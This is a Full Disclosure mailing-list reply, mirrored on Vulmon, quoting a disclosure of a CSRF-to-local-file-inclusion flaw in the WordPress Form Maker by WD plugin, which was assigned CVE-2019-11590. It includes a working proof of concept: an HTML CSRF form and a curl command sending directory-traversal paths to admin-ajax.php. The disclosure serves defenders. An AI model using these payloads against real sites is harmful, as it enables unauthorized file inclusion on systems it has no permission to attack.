Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Re: WordPress Plugin Form Maker by WD [CSRF → LFI]

Related Vulnerabilities: CVE-2019-11590  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="35"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#36">By Date</a>
<a href="37"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="10"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#36">By Thread</a>
<a href="11"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Henri Salo &lt;henri () nerv fi&gt;


<em>Date</em>: Mon, 29 Apr 2019 18:07:27 +0300


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

On Fri, Apr 05, 2019 at 02:01:21PM +0300, Panagiotis Vagenas wrote:
</pre><blockquote style="border-left: #5555EE solid 0.2em; margin: 0em; padding-left: 0.85em"><pre style="margin: 0em;"># Exploit Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: <a rel="nofollow" href="http://web-dorado.com/">http://web-dorado.com/</a>
# Software Link: <a rel="nofollow" href="https://wordpress.org/plugins/form-maker">https://wordpress.org/plugins/form-maker</a>
# Version: 1.13.2
# Tested on: WordPress 5.1

Description
-----------

Plugin implements the following AJAX actions:

- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage_fm`
- `FMShortocde`

All of them call the function `form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

Plugin also registers the following AJAX actions:

- `paypal_info`
- `checkpaypal`

Those seems like the are only available to PRO version users, yet they
also are vulnerable to this attack.

Additionally the following AJAX actions are registered in PRO version:

- `get_frontend_stats`
- `frontend_show_map`
- `frontend_show_matrix`
- `frontend_paypal_info`
- `frontend_generate_csv`
- `frontend_generate_xml`

Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What's more
interesting about those is the fact that are available to non-registered
users also, making this attack directly exploitable, without using a
CSRF attack. In this case the vulnerable param is `$_REQUEST['page']`.

PoC
---

### Using a CSRF attack

```html
&lt;form method="post"
action="<a rel="nofollow" href="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index&quot;">http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index"</a>;&gt;
&nbsp;&nbsp;&nbsp; &lt;label&gt;AJAX action:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;select name="action"&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;optgroup label="Free version"&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="generete_csv"&gt;generete_csv&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="generete_xml"&gt;generete_xml&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="formmakerwdcaptcha"&gt;formmakerwdcaptcha&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="formmakerwdmathcaptcha"&gt;formmakerwdmathcaptcha&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="product_option"&gt;product_option&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="FormMakerEditCountryinPopup"&gt;FormMakerEditCountryinPopup&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="FormMakerMapEditinPopup"&gt;FormMakerMapEditinPopup&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="FormMakerIpinfoinPopup"&gt;FormMakerIpinfoinPopup&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="show_matrix"&gt;show_matrix&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="FormMakerSubmits"&gt;FormMakerSubmits&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="FormMakerSQLMapping"&gt;FormMakerSQLMapping&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="select_data_from_db"&gt;select_data_from_db&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="manage_fm"&gt;manage_fm&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="FMShortocde"&gt;FMShortocde&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/optgroup&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;optgroup label="Pro Version"&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="paypal_info"&gt;paypal_info&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="checkpaypal"&gt;checkpaypal&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="get_frontend_stats"&gt;get_frontend_stats&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option value="frontend_show_map"&gt;frontend_show_map&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="frontend_show_matrix"&gt;frontend_show_matrix&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="frontend_paypal_info"&gt;frontend_paypal_info&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="frontend_generate_csv"&gt;frontend_generate_csv&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;option
value="frontend_generate_xml"&gt;frontend_generate_xml&lt;/option&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/optgroup&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/select&gt;
&nbsp;&nbsp;&nbsp; &lt;/label&gt;
&nbsp;&nbsp;&nbsp; &lt;button type="submit" value="Submit"&gt;Submit&lt;/button&gt;
&lt;/form&gt;
```

### Without leveraging the CSRF vulnerability

```sh
curl '<a rel="nofollow" href="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php&amp;apos">http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php&amp;apos</a>; \
&nbsp;&nbsp;&nbsp; -d 'action=get_frontend_stats&amp;page=/../../../../../index'
```
</pre></blockquote><pre style="margin: 0em;">
MITRE assigned CVE-2019-11590 for this issue.

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAlzHEy8ACgkQJ633pE6q
dXTtyQ/+JJ1QE/wVnH1/P0hXKoorU513ycXMHT9MrfMdi2+Y7tA/FJToQFlPAU+n
Uz0K9QJIUjYc/78rat3d9t3j8nJzwY6v+I6r84SMi9inWNsGu/5qVGM8j3YkKW3W
M74h48ZK5H0zytuOjNxWR8EqvpfU3Kb8V1Cd3Ged1VXpgF8Cc8DR+B9biVS7nocI
z/fpHIEYBQ0uf031t+4hMeuQVvGEILhLnByDIYGW7/HeP/n+YXtExy0ClTT3Lvf0
AmkMBoQhsRgb1X8k+3YPe/zw/cWxaRCjaMtjza120P9lUklWEuD0C+xCB05A4T+f
B3wjmtLnyycWNeTazrCnDwnvGtfqm2uorz0Fs1f9k/JJq5GQPfJA8bb+N0Z/i8hR
8gSFgTukkuLUAsC58IDluCqfqQi9XvtFN0Jh0dBXBzvYxSc9b/eVa5SBK71sjCkg
VcYpxPN5DPnVBLdNoRqlsT/5mDC+ZbiyfTPp4jWMgElJIewkfdakXDwEQ2KLKGZG
vhVm6TEvpd9u+I7fl5UcGdSbQNK7aQhlNmKYgq3hp8FKQsnvXN5b5mylTO+2XgqP
f1c6NsS4fkVPkSzre+jbYIBIL04PqGWCx34ldRV4sBCODFOq1v5pnnY05EaqSpRu
MHPyVgAzSPh8GIYS4zksKhPiKwz2TlAuAR11dnoPdTPlSSXGY7I=
=KvTc
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="35"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#36">By Date</a>
<a href="37"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="10"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#36">By Thread</a>
<a href="11"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><a name="10" href="10">WordPress Plugin Form Maker by WD [CSRF → LFI]</a> <em>Panagiotis Vagenas (Apr 05)</em>
<ul>
<li><strong>Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</strong> <em>Henri Salo (Apr 30)</em>
</li>
</ul>
</li>
</ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started